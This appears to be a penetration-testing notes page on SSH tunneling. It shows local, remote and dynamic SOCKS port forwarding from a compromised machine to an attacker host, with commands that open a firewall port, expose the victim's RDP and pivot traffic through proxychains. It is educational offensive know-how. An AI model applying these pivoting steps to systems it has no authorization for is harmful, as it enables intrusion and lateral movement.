Tunneling

SSH tunneling is a technique used to encapsulate traffic from other protocols within an SSH connection. It is commonly used for secure communication between machines, accessing restricted services, or exposing services securely. There are two main types of SSH tunneling: Local Port Forwarding and Remote Port Forwarding.

Use Cases

Accessing Hidden Services

Gain access to a machine with an SSH client (e.g., PC-1).

Use SSH tunneling to connect to restricted services on another machine (SERVER) that are inaccessible directly from the attacker machine.

Exposing Services Securely

Gain access to a machine with an SSH server.

Use SSH tunneling to forward or expose services from the attacking machine to the SSH server.

Preparation

Create an SSH User on the Attacker Machine to enable tunneling, add a new SSH user on the attacker machine:

useradd tunneluser -m -d /home/tunneluser -s /bin/true

passwd tunneluser

Local Port Forwarding

Purpose: Forward a local port on the SSH client to a service on the target machine, allowing external users to access the service via the SSH client.

Example Scenario:

  • PC-1 establishes a local port forwarding tunnel to expose a web service hosted on the attacker's machine to SERVER.

  • Steps:

    • From PC-1, run:

      ssh tunneluser@1.1.1.1 -L *:80:127.0.0.1:80 -N

      Copy

    • Add a firewall rule on PC-1 to allow traffic on port 80:

      netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80

      Copy

    • Once the tunnel is set up, anyone browsing to PC-1 at http://2.2.2.2:80 will see the website hosted on the attacker machine.

Remote Port Forwarding

Purpose: Forward a port on the SSH server to a service on another machine, allowing the attacker to access the service via the SSH server.

Example Scenario:

  • Expose PC-1's Remote Desktop (RDP) service to the attacker machine securely.

  • Steps:

    • From PC-1, run:

      ssh tunneluser@1.1.1.1 -R 3389:3.3.3.3:3389 -N

      Copy

    • From the attacker machine, connect to the forwarded port via RDP:

      xfreerdp /v:127.0.0.1 /u:MyUser /p:MyPassword

      Copy

Using Private Keys

When using private keys for authentication (more common in the second use case), the following command can be used for local port forwarding:

ssh -i <PRIVATE_KEY> @ -L <NEW_PORT>:127.0.0.1:<HIDDEN_SERVICE_PORT>

Copy

Summary

To pick up a draggable item, press the space bar. While dragging, use the arrow keys to move the item. Press space again to drop the item in its new position, or press escape to cancel.

To pick up a draggable item, press the space bar. While dragging, use the arrow keys to move the item. Press space again to drop the item in its new position, or press escape to cancel.

Type

Command

Purpose

Local Port Forwarding

ssh tunneluser@1.1.1.1 -L *:80:127.0.0.1:80 -N

Forward a local port to a service on the target machine.

Remote Port Forwarding

ssh tunneluser@1.1.1.1 -R 3389:3.3.3.3:3389 -N

Forward a remote port on the SSH server to a service on another machine (e.g., RDP access).

Private Key Use

ssh -i <PRIVATE_KEY> <user>@<ip> -L <NEW_PORT>:127.0.0.1:<HIDDEN_SERVICE_PORT>

Use private keys for authentication when setting up local port forwarding.

Dynamic Port Forwarding with SOCKS

  • Purpose: Access multiple ports or hosts via a pivot machine using a SOCKS proxy.

  • Set Up Tunnel:

ssh tunneluser@1.1.1.1 -D 9050 -N

  • Configure ProxyChains: Add to /etc/proxychains.conf:

[ProxyList]
socks4 127.0.0.1 9050

  • Use ProxyChains: Route traffic through the proxy:

proxychains curl http://target-service.com

  • Note: Some tools (e.g., nmap) may not work well with SOCKS

PreviousSSHNextRsync

Last updated